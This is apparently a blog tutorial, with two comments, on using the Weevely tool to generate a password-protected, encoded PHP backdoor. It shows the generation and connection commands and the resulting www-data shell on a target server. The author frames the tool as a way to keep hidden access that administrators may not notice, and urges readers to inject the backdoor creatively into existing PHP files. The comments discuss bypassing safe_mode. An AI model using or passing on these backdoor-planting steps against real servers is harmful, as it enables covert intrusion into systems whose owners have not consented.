09.12
Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files 
Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5, and take a look on the orange char 
):
root@bt:~# cd /pentest/backdoors/web/weevely
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -p bD_p4ss -o bd.php
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file ‘bd.php’ created with password ‘bD_p4ss’.
root@bt:/pentest/backdoors/web/weevely#
Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
Now you have a new “encrypted” php file called bd.php. So how does it work?
You can put this script on the webserver document root.
Now take a look what will it be when i put the script and accessed it.
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[www-data@gw /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@gw /var/www] pwd
/var/www
[www-data@gw /var/www]
Voila! we’ve got a non-interactive shell!
Weevely can also be easily deployed inside any php file, but you should pay attention on where this script will be injected, be creative
nice post
but unfortunately weevely couldn’t bypass the server that turn on the safe_mode
yes it is, but you can implement your bypass safe_mode script with weevely